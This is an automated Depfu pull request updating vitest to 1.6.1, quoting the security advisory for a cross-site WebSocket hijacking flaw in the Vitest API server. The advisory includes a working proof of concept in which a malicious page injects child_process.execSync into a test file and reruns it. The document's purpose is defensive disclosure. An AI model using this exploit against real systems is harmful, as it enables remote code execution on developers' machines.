🚨 [security] Update vitest 1.6.0 → 1.6.1 (patch)

[depfu]

---

Welcome to Depfu 👋

This is one of the first three pull requests with dependency updates we've sent your way. We tried to start with a few easy patch-level updates. Hopefully your tests will pass and you can merge this pull request without too much risk. This should give you an idea how Depfu works in general.

After you merge your first pull request, we'll send you a few more. We'll never open more than seven PRs at the same time so you're not getting overwhelmed with updates.

Let us know if you have any questions. Thanks so much for giving Depfu a try!

---

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ vitest (1.6.0 → 1.6.1) · Repo

Security Advisories 🚨

🚨 Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.

vitest/packages/vitest/src/api/setup.ts

Lines 32 to 46 in 9a581e1

    <tbody>

    <tr class="border-0">
      <td id="L33" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="33"></td>
      <td id="LC33" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-c1">!</span><span class="pl-s1">request</span><span class="pl-kos">.</span><span class="pl-c1">url</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L34" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="34"></td>
      <td id="LC34" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">     <span class="pl-k">return</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L35" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="35"></td>
      <td id="LC35" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-kos">}</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L36" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="36"></td>
      <td id="LC36" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">  </td>
    </tr>

    <tr class="border-0">
      <td id="L37" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="37"></td>
      <td id="LC37" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-k">const</span> <span class="pl-kos">{</span> pathname <span class="pl-kos">}</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> <span class="pl-c1">URL</span><span class="pl-kos">(</span><span class="pl-s1">request</span><span class="pl-kos">.</span><span class="pl-c1">url</span><span class="pl-kos">,</span> <span class="pl-s">'http://localhost'</span><span class="pl-kos">)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L38" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="38"></td>
      <td id="LC38" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">pathname</span> <span class="pl-c1">!==</span> <span class="pl-c1">API_PATH</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L39" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="39"></td>
      <td id="LC39" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">     <span class="pl-k">return</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L40" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="40"></td>
      <td id="LC40" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-kos">}</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L41" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="41"></td>
      <td id="LC41" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">  </td>
    </tr>

    <tr class="border-0">
      <td id="L42" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="42"></td>
      <td id="LC42" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-s1">wss</span><span class="pl-kos">.</span><span class="pl-en">handleUpgrade</span><span class="pl-kos">(</span><span class="pl-s1">request</span><span class="pl-kos">,</span> <span class="pl-s1">socket</span><span class="pl-kos">,</span> <span class="pl-s1">head</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-s1">ws</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L43" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="43"></td>
      <td id="LC43" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">     <span class="pl-s1">wss</span><span class="pl-kos">.</span><span class="pl-en">emit</span><span class="pl-kos">(</span><span class="pl-s">'connection'</span><span class="pl-kos">,</span> <span class="pl-s1">ws</span><span class="pl-kos">,</span> <span class="pl-s1">request</span><span class="pl-kos">)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L44" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="44"></td>
      <td id="LC44" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">     <span class="pl-en">setupClient</span><span class="pl-kos">(</span><span class="pl-s1">ws</span><span class="pl-kos">)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L45" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="45"></td>
      <td id="LC45" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-kos">}</span><span class="pl-kos">)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L46" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="46"></td>
      <td id="LC46" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-kos">}</span><span class="pl-kos">)</span> </td>
    </tr>
</tbody>

server.httpServer?.on('upgrade', (request, socket, head) => {

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.

vitest/packages/vitest/src/api/setup.ts

Lines 66 to 76 in 9a581e1

    <tbody>

    <tr class="border-0">
      <td id="L67" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="67"></td>
      <td id="LC67" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-c1">!</span><span class="pl-s1">ctx</span><span class="pl-kos">.</span><span class="pl-c1">state</span><span class="pl-kos">.</span><span class="pl-c1">filesMap</span><span class="pl-kos">.</span><span class="pl-en">has</span><span class="pl-kos">(</span><span class="pl-s1">id</span><span class="pl-kos">)</span> <span class="pl-c1">||</span> <span class="pl-c1">!</span><span class="pl-en">existsSync</span><span class="pl-kos">(</span><span class="pl-s1">id</span><span class="pl-kos">)</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L68" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="68"></td>
      <td id="LC68" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">     <span class="pl-k">throw</span> <span class="pl-k">new</span> <span class="pl-v">Error</span><span class="pl-kos">(</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L69" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="69"></td>
      <td id="LC69" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">       <span class="pl-s">`Test file "<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">id</span><span class="pl-kos">}</span></span>" was not registered, so it cannot be updated using the API.`</span><span class="pl-kos">,</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L70" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="70"></td>
      <td id="LC70" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">     <span class="pl-kos">)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L71" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="71"></td>
      <td id="LC71" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-kos">}</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L72" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="72"></td>
      <td id="LC72" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-k">return</span> <span class="pl-s1">fs</span><span class="pl-kos">.</span><span class="pl-en">writeFile</span><span class="pl-kos">(</span><span class="pl-s1">id</span><span class="pl-kos">,</span> <span class="pl-s1">content</span><span class="pl-kos">,</span> <span class="pl-s">'utf-8'</span><span class="pl-kos">)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L73" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="73"></td>
      <td id="LC73" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-kos">}</span><span class="pl-kos">,</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L74" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="74"></td>
      <td id="LC74" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-k">async</span> <span class="pl-en">rerun</span><span class="pl-kos">(</span><span class="pl-s1">files</span><span class="pl-kos">,</span> <span class="pl-s1">resetTestNamePattern</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L75" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="75"></td>
      <td id="LC75" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-k">await</span> <span class="pl-s1">ctx</span><span class="pl-kos">.</span><span class="pl-en">rerunFiles</span><span class="pl-kos">(</span><span class="pl-s1">files</span><span class="pl-kos">,</span> <span class="pl-c1">undefined</span><span class="pl-kos">,</span> <span class="pl-c1">true</span><span class="pl-kos">,</span> <span class="pl-s1">resetTestNamePattern</span><span class="pl-kos">)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L76" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="76"></td>
      <td id="LC76" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-kos">}</span><span class="pl-kos">,</span> </td>
    </tr>
</tbody>

async saveTestFile(id, content) {

PoC

1. Open Vitest UI.
2. Access a malicious web site with the script below.
3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});
// actual code to run

const ws = new WebSocket('ws://localhost:51204/vitest_api')

ws.addEventListener('message', e => {

console.log(e.data)

})

ws.addEventListener('open', () => {

ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))
<span class="pl-k">const</span> <span class="pl-s1">testFilePath</span> <span class="pl-c1">=</span> <span class="pl-s">"/path/to/test-file/basic.test.ts"</span> <span class="pl-c">// use a test file returned from the response of "getFiles"</span>

<span class="pl-c">// edit file content to inject command execution</span>
<span class="pl-s1">ws</span><span class="pl-kos">.</span><span class="pl-en">send</span><span class="pl-kos">(</span><span class="pl-v">Flatted</span><span class="pl-kos">.</span><span class="pl-en">stringify</span><span class="pl-kos">(</span><span class="pl-kos">{</span>
  <span class="pl-c1">t</span>: <span class="pl-s">'q'</span><span class="pl-kos">,</span>
  <span class="pl-c1">i</span>: <span class="pl-s1">crypto</span><span class="pl-kos">.</span><span class="pl-en">randomUUID</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">,</span>
  <span class="pl-c1">m</span>: <span class="pl-s">"saveTestFile"</span><span class="pl-kos">,</span>
  <span class="pl-c1">a</span>: <span class="pl-kos">[</span><span class="pl-s1">testFilePath</span><span class="pl-kos">,</span> <span class="pl-s">"import child_process from 'child_process';child_process.execSync('calc')"</span><span class="pl-kos">]</span>
<span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">)</span>
<span class="pl-c">// rerun the tests to run the injected command execution code</span>
<span class="pl-s1">ws</span><span class="pl-kos">.</span><span class="pl-en">send</span><span class="pl-kos">(</span><span class="pl-v">Flatted</span><span class="pl-kos">.</span><span class="pl-en">stringify</span><span class="pl-kos">(</span><span class="pl-kos">{</span>
  <span class="pl-c1">t</span>: <span class="pl-s">'q'</span><span class="pl-kos">,</span>
  <span class="pl-c1">i</span>: <span class="pl-s1">crypto</span><span class="pl-kos">.</span><span class="pl-en">randomUUID</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">,</span>
  <span class="pl-c1">m</span>: <span class="pl-s">"rerun"</span><span class="pl-kos">,</span>
  <span class="pl-c1">a</span>: <span class="pl-kos">[</span><span class="pl-s1">testFilePath</span><span class="pl-kos">]</span>
<span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">)</span>

})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Release Notes

1.6.1

This release includes security patches for:

• Remote Code Execution when accessing a malicious website while Vitest API server is listening | CVE-2025-24964

   🐞 Bug Fixes

• backport #7317 to v1 - by @hi-ogawa in #7319

    View changes on GitHub

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 6 commits:

• chore: release v1.6.1
• chore: remove release branch update from releasing
• fix: backport #7317 to v1 (#7319)
• docs: show a warning in v1 docs (#7003)
• docs: add version to title, remove edit link
• docs: build documentation for v1

---

👉 No CI detected

You don't seem to have any Continuous Integration service set up!

Without a service that will test the Depfu branches and pull requests, we can't inform you if incoming updates actually work with your app. We think that this degrades the service we're trying to provide down to a point where it is more or less meaningless.

This is fine if you just want to give Depfu a quick try. If you want to really let Depfu help you keep your app up-to-date, we recommend setting up a CI system:

* [Circle CI](https://circleci.com), [Semaphore ](https://semaphoreci.com) and [Github Actions](https://docs.github.com/actions) are all excellent options. * If you use something like Jenkins, make sure that you're using the Github integration correctly so that it reports status data back to Github. * If you have already set up a CI for this repository, you might need to check your configuration. Make sure it will run on all new branches. If you don’t want it to run on every branch, you can whitelist branches starting with `depfu/`.

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)